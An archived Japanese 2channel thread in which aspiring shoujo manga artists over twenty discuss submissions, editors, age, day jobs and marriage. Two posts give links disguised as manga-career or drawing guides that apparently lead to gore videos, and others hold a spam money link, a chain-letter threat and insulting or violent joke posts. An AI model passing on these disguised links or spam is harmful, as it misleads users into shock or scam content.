ゲームの「恋する女の子」は一途で可愛い。
これを男に置き換えると…ハァハァ
そんな思春期。

163 :名無しさん名無しさん:2006/10/29(日) 18:22:53
FF話うざい

164 :名無しさん名無しさん:2006/10/29(日) 18:39:12
枕営業とか意味わからん
体の関係持っちゃった女なんて視界にすら入れたくないのが男じゃないのか?
ほんとに仕事くれんの?普通足ひっぱられそうだけどな

165 :名無しさん名無しさん:2006/10/29(日) 18:51:41
枕もうざい

166 :名無しさん名無しさん:2006/10/30(月) 09:08:22
枕を売ってる人に失礼だよ

167 :名無しさん名無しさん:2006/11/02(木) 19:41:43
えーっと・・・枕からオヤジな匂いがするってところからだっけ?


168 :名無しさん名無しさん:2006/11/03(金) 16:34:38
私マダ担当ついてないから分からないんだけど
デビュー前でも担当と外で打ち合わせしたりするの?
FAXやりとりだけかと思ってた。。。

169 :名無しさん名無しさん:2006/11/03(金) 16:47:48
する。デビュー間近の人ならなおさら。

170 :名無しさん名無しさん:2006/11/03(金) 16:59:38
岸本斉史はデビュー前に九州まで担当が来たらしいね

171 :名無しさん名無しさん:2006/11/05(日) 01:21:55
青森来たよ

172 :名無しさん名無しさん:2006/11/05(日) 02:53:35
明日をつかめ!(少女漫画家への道)
ttp://www.yourfilehost.com/media.php?cat=video&file=butcher.wmv

小学館って微妙じゃね?



>>171
それ自分の話?!
だったら有望じゃないか?

173 :名無しさん名無しさん:2006/11/05(日) 04:28:12
不倫旅行に青森来て、たまたま寄っただけだろ

174 :名無しさん名無しさん:2006/11/05(日) 08:28:29
http://ime.nu/gazo08.chbox.jp/guromovie/src/1161091469222.wmv
グロ漫画の描き方(テクニシャン編)



175 :名無しさん名無しさん:2006/11/08(水) 20:26:11
また過疎かしらー

176 :名無しさん名無しさん:2006/11/09(木) 05:36:19
ネタ切れかしらー

177 :名無しさん名無しさん:2006/11/10(金) 07:44:26
かしらかしら♪そ〜かしら〜♪

178 :名無しさん名無しさん:2006/11/10(金) 14:11:06
かしらかしら、ご存知かしら〜〜

179 :名無しさん名無しさん:2006/11/10(金) 14:48:44
116は結局どうなったのだろう

180 :名無しさん名無しさん:2006/11/10(金) 21:20:25
ベツコミが何気に年齢に優しい。
こういうところ増えないかな。

181 :名無しさん名無しさん:2006/11/10(金) 21:29:11
最後まで年齢書かずにデビューした。
デビュー後担当さんには聞かれたけど
「答えたくない年齢です・・・」
と言ったらそれ以上追求されなかった。
どうしても年齢が気になる人は
いっそ書かないってのもありだと思う。
それで落とされることはない。

182 :名無しさん名無しさん:2006/11/10(金) 21:44:47
116です。
話変わってたので蒸し返すのもアレかなと思って、ロムってました。

もし変な感じだったら無邪気にぶっちぎろう!と思ってご飯いきました。
で、二人っきりだと思ってたら、同僚の編集さんと副編集長さんも一緒でした。
初めは飲みつつネーム見てもらって、
あとは業界話とか作家さんの噂とか他の投稿者さんの話とかしてました。

行く前は自意識過剰になっちゃってましたけど、他の編集さん紹介して貰ったり、
複数の編集さんの意見を聞けたりと凄い有意義でした。

183 :名無しさん名無しさん:2006/11/10(金) 22:11:33
>>181
ど、どこの雑誌?

28歳と31歳だったらさほど扱いが変わらない
絵が上手くて感性も若めの25歳が22歳と申告したら
余計な不安が取れてバランスがいい
東京の有名校に在学中だったら詐称がしにくい
漫専に在学中だったら仲間達に情報が行くので詐称がしにくい
とか(選ぶ側の立場に立って)色々考えてしまった。

184 :名無しさん名無しさん:2006/11/10(金) 22:53:30
記入漏れとして…それでいいと本気で思ってますか?

185 :名無しさん名無しさん:2006/11/10(金) 23:04:01
PNと住所だけ書いとけばよくね?
TELや本名は、あんた達で調べなって書き添えて

186 :名無しさん名無しさん:2006/11/10(金) 23:58:14

アホが湧いとるなw

187 :名無しさん名無しさん:2006/11/11(土) 00:02:45
実際185みたく書いて、作品が超絶的に上手かったら伝説になるな。

188 :名無しさん名無しさん:2006/11/11(土) 00:13:06
なにわ小吉か

189 :名無しさん名無しさん:2006/11/11(土) 00:29:21
電番は必須だろw

190 :名無しさん名無しさん:2006/11/11(土) 00:29:51
欧米か

191 :名無しさん名無しさん:2006/11/11(土) 03:01:28
>>182
無事でなにより。

192 :名無しさん名無しさん:2006/11/11(土) 10:46:26
なにわ小吉には笑ったな。
誌面でデビューと同時に指名手配されてたもんな。

193 :名無しさん名無しさん:2006/11/11(土) 12:55:31
私もリアルタイムで見たw>なにわ
逆に強烈なインパクトつけられたよね

194 :名無しさん名無しさん:2006/11/11(土) 13:40:10
ニセモノ出現防止のために「なにわ××」で誌面に載ってたっけ

195 :名無しさん名無しさん:2006/11/11(土) 14:54:29
              |    丶 _    .,!     ヽ
               >     ``‐.`ヽ、  .|、     |
             ゙'.     ,ト `i、  `i、    .、″
                |    .,.:/""  ゙‐,. `    /
             `  .,-''ヽ"`    ヽ,,,、   !
                、,、‐'゙l‐、      .丿 : ':、
               、/ヽヽ‐ヽ、;,,,,,,,,,-.ッ:''`  .,"-、
              ,r"ツぃ丶  ``````   ../  `i、
          ,.イ:、ヽ/ー`-、-ヽヽヽ、−´    .l゙`-、
         _,,l゙-:ヽ,;、、             、、丶  ゙i、,,、
        ,<_ l_ヽ冫`'`-、;,,,、、、、.............,,,,、.-`":    │ `i、
      、、::|、、、ヽ,、、.    ```: : : ```      、.、'`  .|丶、
     .l","ヽ、,"、,"'、ぃ、、,、、、、.、、、.、、、_、.,,.ヽ´    l゙  ゙).._
    ,、':゙l:、、`:ヽ、`:、  : `"```¬――'''"`゙^`     : ..、丶  .l゙ `ヽ
   ,i´.、ヽ".、".、"'ヽヽ;,:、........、           、、...,,,、−‘`   、‐   |゙゙:‐,
  ,.-l,i´.、".`ヽ,,,.".`   `゙゙'"`'-ー"``"``r-ー`'":      _.‐′  丿  ,!
 j".、'ヽ,".、".、"`''`ー、._、、、           、._,、..-‐:'''′   .、,:"  丿
 ゙l,"`"`''ヽヽ"`"`  ```゙'''"ヽ∠、、、、ぃ-`''''": `      、._./`  ._/`
  `'i`ヽヽヽ`''ーi、、、: :                   、.,-‐'`   、/`
   ``ヽン'`"`  : `~``―ヽ::,,,,,,,,,,.....................,,,,.ー'``^    ,、‐'"`
      `"'゙―-、,,,,..、、                 : ..,、ー'"'`
           : `‘"`―---------‐ヽ``"''''''""





196 :名無しさん名無しさん:2006/11/11(土) 14:55:23
              |    丶 _    .,!     ヽ
               >     ``‐.`ヽ、  .|、     |
             ゙'.     ,ト `i、  `i、    .、″
                |    .,.:/""  ゙‐,. `    /
             `  .,-''ヽ"`    ヽ,,,、   !
                、,、‐'゙l‐、      .丿 : ':、
               、/ヽヽ‐ヽ、;,,,,,,,,,-.ッ:''`  .,"-、
              ,r"ツぃ丶  ``````   ../  `i、
          ,.イ:、ヽ/ー`-、-ヽヽヽ、−´    .l゙`-、
         _,,l゙-:ヽ,;、、             、、丶  ゙i、,,、
        ,<_ l_ヽ冫`'`-、;,,,、、、、.............,,,,、.-`":    │ `i、
      、、::|、、、ヽ,、、.    ```: : : ```      、.、'`  .|丶、
     .l","ヽ、,"、,"'、ぃ、、,、、、、.、、、.、、、_、.,,.ヽ´    l゙  ゙).._
    ,、':゙l:、、`:ヽ、`:、  : `"```¬――'''"`゙^`     : ..、丶  .l゙ `ヽ
   ,i´.、ヽ".、".、"'ヽヽ;,:、........、           、、...,,,、−‘`   、‐   |゙゙:‐,
  ,.-l,i´.、".`ヽ,,,.".`   `゙゙'"`'-ー"``"``r-ー`'":      _.‐′  丿  ,!
 j".、'ヽ,".、".、"`''`ー、._、、、           、._,、..-‐:'''′   .、,:"  丿
 ゙l,"`"`''ヽヽ"`"`  ```゙'''"ヽ∠、、、、ぃ-`''''": `      、._./`  ._/`
  `'i`ヽヽヽ`''ーi、、、: :                   、.,-‐'`   、/`
   ``ヽン'`"`  : `~``―ヽ::,,,,,,,,,,.....................,,,,.ー'``^    ,、‐'"`
      `"'゙―-、,,,,..、、                 : ..,、ー'"'`
           : `‘"`―---------‐ヽ``"''''''""





197 :名無しさん名無しさん:2006/11/11(土) 22:27:14
>>195
>>196
激しく同意

198 :名無しさん名無しさん:2006/11/12(日) 15:05:56
携帯だからAAわかんない(;ω;`)なにが同意なのですか気になるじゃないですか

199 :名無しさん名無しさん:2006/11/12(日) 16:38:36
>>198
うんこのAAだよ

200 :名無しさん名無しさん:2006/11/12(日) 21:58:11
最近りぼんスレ荒らしてたのってやっぱりover20だったのか…
ここのある一文のコピペが貼ってあったよ。

20になったらここに来ます
さのなら。

201 :名無しさん名無しさん:2006/11/17(金) 14:42:54
>>200
まだ10代?若くてうらやま

202 :名無しさん名無しさん:2006/11/19(日) 08:14:34
まだ20代?
若くてうらやま

って10年後言う!

203 :名無しさん名無しさん:2006/11/23(木) 23:18:52
まだ30代?
若くてうらやま

って10年後言う!

204 :名無しさん名無しさん:2006/11/24(金) 01:06:26
まだ40代?
若くてうらやま

って10年後言う!

205 :名無しさん名無しさん:2006/11/24(金) 06:07:22
まだ50代?
若くてうらやま

って10年後言う!

206 :名無しさん名無しさん:2006/11/24(金) 10:15:56
まだ60代?
若くてうらやま

って10年後言う!

207 :名無しさん名無しさん:2006/11/24(金) 11:14:22
まだ存命?
生きてるってうらやま!

って幻聴が聴こえry

208 :名無しさん名無しさん:2006/11/24(金) 15:53:55
もう天国?
死んでるってうらやま

って死んだら言う!


209 :名無しさん名無しさん:2006/11/24(金) 23:04:44
>>208
意味が分からん。
自分も死んでるのに何が羨ましいの?

210 :名無しさん名無しさん:2006/11/25(土) 00:47:24
ここの住人で社会人さんに質問!みんなどのくらいのペースで投稿してる?
自分はこれから再開する予定で、二ヵ月ごとに出せればいいなあと思ってる感じです

211 :名無しさん名無しさん:2006/11/25(土) 01:13:08
出せてないけど、来年は3ヶ月に1本くらいは出したい。
何時間くらい、平日に時間割けるかにもよるよね?
私は3時間出来ればかなりいい方かなって状態。

212 :名無しさん名無しさん:2006/11/25(土) 19:16:45
                             |
                             |
       {    !      _,, -ェェュ、   |
ィ彡三ミヽ  `ヽ     ,ィハミミミミミミミミミヽ、|
彡'⌒ヾミヽ   `ー  /ililハilミilミliliミliliミliliミ|
     ヾ、        /iiiiイ!ヾヾミ、ミニ=ー-liミ|
  _    `ー―' i!ハ:.:.\\_::::::::::::::/:.| このスレは
彡三ミミヽ        i! ヽ:.:.:.:冫': : :::/,,∠| 
彡'   ヾ、    _ノ i!::: ̄二ー:: : ::::ソ ・ ,| リボルバーに
      `ー '    {ヘラ' ・_>シ;テツ"''''"| 
 ,ィ彡三ニミヽ  __ノ ヽヘ`" 彡' 〈     | 監視されて
彡'      ` ̄       `\   ー-=ェっ |
      _  __ ノ  {ミ;ヽ、   ⌒   | います
   ,ィ彡'   ̄        ヾミミミミト-- '  |
ミ三彡'        /⌒ / ̄ ̄ | : ::::::::::|
       ィニニ=- '     / i   `ー-(二つ
     ,ィ彡'         { ミi      (二⊃
   //        /  l ミii       ト、二)
 彡'       __,ノ   | ミソ     :..`ト-'
        /          | ミ{     :.:.:..:|
            ノ / ヾ\i、   :.:.:.:.:|
      ィニ=-- '"  /  ヾヾiiヽ、 :.:.:.:.::::|
    /     /  `/ ̄ ̄7ハヾヾ : .:.:.|
   ノ     _/   /   /  |:. :.:.:.:.:.:.:|





213 :名無しさん名無しさん:2006/11/26(日) 01:58:16
出勤日は帰宅後は疲れて無理だから
休日しか作業できないや。
でも休日短期集中で一気に進めてる。

214 :名無しさん名無しさん:2006/11/26(日) 02:05:56

           ○   ∇ 、,、´`゙;~、  ';冫 ☆
           ┏  ━ゝヽ''人∧━∧从━〆A!゚━━┓。
 ╋┓"〓┃  < ゝ\',冫。' ∩___∩ ゛△│´'´,.ゝ'┃.      ●┃ ┃┃
 ┃┃_.━┛ヤ━━━━━ | ノ      ヽ━━━━━━━━━  ━┛ ・ ・
        ∇  ┠─Σ-/  ●   ● |  ァ Ζそ,´; ┨'゚,。
           .。冫▽ < |    ( _●_)  ミ  乙  ≧   ▽
         。 ┃   彡、   |∪|  、`\ │   て く
           ┠─./ __  ヽノ /´>  )'.┼ ァ Ζ┨ ミo''`
         。、゚`。、 (___)   / (_/' ×  个o
        ○  ┃   `|       /   !ヽ.◇    o┃
            ┗〆━┷ Z,.' /┷━''o ヾo┷+\━┛,゛;
       ヾ                   '、´    ∇

  ブ       レ      ー     イ       ク       !



215 :名無しさん名無しさん:2006/11/26(日) 09:33:47
現在初投稿作描いてます(>_<)

216 :名無しさん名無しさん:2006/11/26(日) 10:16:35
あきらめの悪いおばさんたちガンバッテネ。

217 :名無しさん名無しさん:2006/11/26(日) 17:41:04

           ○   ∇ 、,、´`゙;~、  ';冫 ☆
           ┏  ━ゝヽ''人∧━∧从━〆A!゚━━┓。
 ╋┓"〓┃  < ゝ\',冫。' ∩___∩ ゛△│´'´,.ゝ'┃.      ●┃ ┃┃
 ┃┃_.━┛ヤ━━━━━ | ノ      ヽ━━━━━━━━━  ━┛ ・ ・
        ∇  ┠─Σ-/  ●   ● |  ァ Ζそ,´; ┨'゚,。
           .。冫▽ < |    ( _●_)  ミ  乙  ≧   ▽
         。 ┃   彡、   |∪|  、`\ │   て く
           ┠─./ __  ヽノ /´>  )'.┼ ァ Ζ┨ ミo''`
         。、゚`。、 (___)   / (_/' ×  个o
        ○  ┃   `|       /   !ヽ.◇    o┃
            ┗〆━┷ Z,.' /┷━''o ヾo┷+\━┛,゛;
       ヾ                   '、´    ∇

  ブ       レ      ー     イ       ク       !




218 :名無しさん名無しさん:2006/11/29(水) 12:10:33
講談のキスって雑誌に投稿した人っている?今度やろうかと思うんだが、どんなもんなのかと…

219 :名無しさん名無しさん:2006/11/29(水) 22:37:31
^^

220 :名無しさん名無しさん:2006/12/03(日) 23:46:51
キス買ったこともないが
自分は別マ出してみようかと

221 :名無しさん名無しさん:2006/12/04(月) 16:25:16
マジレスすると
>>218
相当レベル高いと思った方がいい。
少女誌にくらべてヤングレディース系は新人育成も比較的熱心でないし
求められるレベルもはるかに高い。

222 :名無しさん名無しさん:2006/12/04(月) 19:59:57
それ狙ってる層と年齢が近いからレベル高いように見えるだけじゃね?

223 :名無しさん名無しさん:2006/12/07(木) 00:12:22
みなさん夢に向かって頑張って下さい。
応援してます。
あきらめないことは、すばらしいことだと思います。

224 :名無しさん名無しさん:2006/12/07(木) 01:29:35
少女誌もっと増えないかな

225 :名無しさん名無しさん:2006/12/09(土) 22:21:14
中性少女誌に増えて欲しい
イケメン美少女はいくつ食っても足りない

226 :名無しさん名無しさん:2006/12/12(火) 01:47:07
少年誌っぽいアニメ絵漫画か、萌え重視の主人公マンセー恋愛漫画しか最近見かけない気がする…
ヒューマンドラマが主体の内容は好かれないのかなぁ

227 :名無しさん名無しさん:2006/12/12(火) 04:10:56
少年誌っぽいアニメ絵漫画大好きでつ。
DBやサトジュン作品で育ったんだもん。
メイドや絶対領域の良さはよく解らんが。

228 :名無しさん名無しさん:2006/12/13(水) 20:18:36
男性誌女性誌が売れるようになったから
ヒューマンドラマ好きな人は作者も読者もそっちに避難したんじゃない?
ちなみに最近の7seeds大好き

229 :名無しさん名無しさん:2006/12/22(金) 08:28:14
なんとかスレタイが20歳になる前にデビューしたい

230 :名無しさん名無しさん:2006/12/22(金) 17:31:38
この流れの遅さだと、あと5.6年は大丈夫かなw

231 :名無しさん名無しさん:2006/12/24(日) 16:23:30
社会経験した方がいいって言ったの誰だ〜
資格有か高学歴じゃないと就職先ないって言ったの誰だ〜

232 :名無しさん名無しさん:2006/12/24(日) 16:42:15
社会経験はマジであった方が断然いい。ないとこの先つらいことばかりだぞ。
就職先は選ばなければ結構ある。

233 :名無しさん名無しさん:2006/12/24(日) 17:15:19
>231
よくわからんが誰かのせいにしたいのか?

234 :名無しさん名無しさん:2006/12/27(水) 10:06:15
来年こそは担当つきますように。。

235 : 【大吉】 【1421円】 :2007/01/01(月) 22:45:00
あけおめ〜

236 :名無しさん名無しさん:2007/01/05(金) 00:58:29
新年記念パピコw
何となく今年は少し前進できそうな気がするよ

みんな頑張ろうねp(^^)q

237 :名無しさん名無しさん:2007/01/05(金) 01:03:46
バイトとかする時間がなくても稼げるよ〜☆☆http://1hp.jp/?id=ragan

238 :名無しさん名無しさん:2007/01/09(火) 00:53:04
アリの巣コロリってあるじゃん。
蟻の行列にポンと置くと、一瞬ビックリして列が乱れる。
邪魔だなと言わんばかりに迂回する列が出来る。
そのうち好奇心旺盛な一匹がアリの巣コロリに入る。
そいつをマネして何匹も入る。
毒とも知らずにツブツブを運び出す。
一匹が一粒づつ。
いつのまにか行列はアリの巣コロリが折り返し地点になる。
黄色い粒と黒い蟻が作り出す模様は綺麗で見てて楽しい。
一匹が一粒づつ、丁寧にせっせと毒の粒を運ぶ。
せっせと、せっせと、せっせと、せっせと。
蟻さんって働き者だなと思う。
次の日、あれほど沢山いて俺を困らせた蟻が一匹もいない。
ほんとにいない。
探してもいない。
泣きたくなった。




このレスを見た人は4日後にあなたの大切な人がいなくなるでしょう・・・・
それが嫌ならこのレスを5つの板にコピペしてください。
信じるか信じないかはあなた次第です。

239 :名無しさん名無しさん:2007/01/09(火) 14:57:51
>>232
面接落とされてばっかりの私に何かアドバイス下さい。

体が弱いのが悪いのは分かってるんだけど、自分の治療費も稼げないのは苦しいと
去年入院して身にしみました・・・orz ケッコウナ ニュウインヒ オヤニ ハラワセチャッタヨ

240 :名無しさん名無しさん:2007/01/10(水) 01:00:13
健康だけど面接20回連続落ちた私に比べたらまだマシ。
内職ならいいんじゃない?
家で自分のペースで出来そうだし、具合いが悪くなったら勝手に休めるし。

241 :名無しさん名無しさん:2007/01/10(水) 13:35:50
年取るともっと体力落ちるんだって!絵も劣化するんだって!

orz

242 :名無しさん名無しさん:2007/01/10(水) 13:56:20
20回落ちても健康の方がいい

243 :名無しさん名無しさん:2007/01/14(日) 14:54:09
諦めろよババ共

とっととガキでもこしらえて社会に貢献しろ

244 :名無しさん名無しさん:2007/01/14(日) 17:14:29
子供産めないもん・・・子種がないから

245 :名無しさん名無しさん:2007/01/14(日) 17:22:15
正直、テレビに水着姿や半裸の男が映るだけでキモいし
私に権力があるなら男は全員皆殺しにしたいくらいなので
一生独身でいることが社会貢献だと思ってる。
結婚なんかしたら確実に殺戮衝動に駆られるわ。刃物好きだし。

246 :244:2007/01/14(日) 17:45:49
あ、私は男の裸大好きですからーうふふ

247 :名無しさん名無しさん:2007/01/14(日) 19:55:42
>245が男のデッサン取れているのか気になるな

自分は結婚したいな〜1度は見合いしてみたい

248 :名無しさん名無しさん:2007/01/14(日) 20:38:32
>>245はフィリピン人かw

社会貢献の意味も分からないなんて
仮にも大人だろーに

249 :名無しさん名無しさん:2007/01/14(日) 22:17:33
>>245の過去になにがあったか気になる。

同じく結婚してみたいけど、果たして漫画家に理解ある男はこの世にいるのだろうか?
漫画家で結婚してる人は漫画も家事も子育てもやってるんだろうか?
私だったら無理だな


250 :名無しさん名無しさん:2007/01/14(日) 22:41:00
>>245は不感症レズだと思う。

251 :名無しさん名無しさん:2007/01/14(日) 23:19:10
>>245キモス

252 :名無しさん名無しさん:2007/01/14(日) 23:53:02
自分新人漫画家なのでスレ違いかもだが…
自分は漫画とバイトと家事をしながら同棲してた。
全く家事を手伝ってくれなかったので
日々ストレスがたまり別れた。(まぁそれだけじゃないけど)
しかもバイトしかしてないんだから
ヒマだと思われたのがスゲーむかついたよ。
あんまり載ってないからってヒマじゃねーんだよ。
空いてる時間は全部漫画やってんだよ。
お前が思ってる以上に漫画かくのは時間かかるもんなんだよ。
家事とバイトと漫画やってりゃ遊びにも行けねーよ。
いつも家にいるからってヒマと思うなよ!
ヒマじゃねーから家にいんだよ!


…と、ゴメン。書いてる内に熱くなってしまった。
みんな、旦那は本当に理解ある人を選んだ方がいいよ…

253 :名無しさん名無しさん:2007/01/14(日) 23:54:16
いらない

254 :名無しさん名無しさん:2007/01/15(月) 01:36:09
>>252
ガンガレ!
どこの雑誌か解らないけど一読者として応援してる
漫画描くの時間かかるよな〜。

255 :名無しさん名無しさん:2007/01/15(月) 08:45:15
もう13歳かよ…

256 :名無しさん名無しさん:2007/01/15(月) 10:33:11
まったく関係ないんだけどさ、
ペン握ってよく描いた日って、ペン握ってた方の指の感覚鈍くならない?

257 :名無しさん名無しさん:2007/01/15(月) 10:39:43
マルチ?

まあ、そんな日は感覚鈍くなるというかなんか手がトンでる気分だな

258 :245:2007/01/15(月) 12:05:35
ネタで書いたのに・・・
レス下さった方、お付き合いくださり有難うございました

259 :名無しさん名無しさん:2007/01/15(月) 13:02:16
ていうか、このスレにこんな人がいた事に驚きw

260 :名無しさん名無しさん:2007/01/15(月) 19:41:22
>>258
負けず嫌いだなw

そのうちバラバラやるんじゃね?おまえ

261 :名無しさん名無しさん:2007/01/15(月) 20:53:39
>>260
そこまで反応しなくていいじゃん
女を皆殺しってならネタでも気分悪いけど
男の少女漫画家志望とか?

262 :名無しさん名無しさん:2007/01/15(月) 23:50:01
きたがわ翔につづけ…(・ω・)/

263 :名無しさん名無しさん:2007/01/16(火) 20:22:09
漫画家になりたいんですけど、まず何をすればいいですか?

264 :名無しさん名無しさん:2007/01/16(火) 21:45:33
>>263
まず2ちゃんをやめることだ

265 :名無しさん名無しさん:2007/01/21(日) 04:13:28
>261
え、245はそこを踏まえたネタだと思うけど。
しかしセンスない。負けず嫌いの根性で漫画家になれても一流にはまずならない。

266 :名無しさん名無しさん:2007/01/22(月) 09:18:27
>>263
漫画描いてみりゃあ良いんじゃない

267 :名無しさん名無しさん:2007/01/22(月) 12:45:25
こないだのNHKのプロフェッショナルみた?
やっぱプロは凄いと思った

268 :名無しさん名無しさん:2007/01/22(月) 16:21:18
アニメの人だっけ

269 :名無しさん名無しさん:2007/01/22(月) 16:46:17
アニメの人ってどこまでを指すのかわからんが浦沢直樹でそ

270 :名無しさん名無しさん:2007/01/22(月) 18:50:13
プロフェッショナルとは―――――――
 締め切りがあること。そして、その締め切りまでに最善の努力をする人のこと。
by浦沢直樹

271 :名無しさん名無しさん:2007/01/22(月) 18:50:17
浦沢直樹はマンガの人でそ

272 :名無しさん名無しさん:2007/01/22(月) 20:23:10
行き詰った時って
どうしてる???

273 :名無しさん名無しさん:2007/01/22(月) 20:28:55
>>271
いや、「アニメになった漫画を描いた人」っていうのもあるのかなとか思ってさw

274 :名無しさん名無しさん:2007/01/22(月) 21:00:57
>>272
漫画以外のことをする

275 :名無しさん名無しさん:2007/01/23(火) 18:46:39
行き詰った時も漫画を描かねばならないのがプロフェッショナル

276 :名無しさん名無しさん:2007/01/23(火) 18:51:52
気分転換しても先延ばしになるだけで描けないものはかけないのよ。
先生にぶっ倒れるまで机に座ってろと言われた。プロはそうだね。

277 :名無しさん名無しさん:2007/01/23(火) 21:39:49
297 :名無しさん名無しさん :2007/01/23(火) 19:34:03
吉井凛 トレースパクリ クッキー集英社より
http://p.pita.st/?m=hmbvestv
↓左、ロゴにあわせたほうに注目
http://p.pita.st/?1zaxc8e6
606 :花と名無しさん :2007/01/23(火) 18:04:22 ID:???0
>>594
一枚目の奴、ロゴが!!! ロゴがそのまんまや〜〜〜!!!
こりゃ言い訳できんね。

58 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)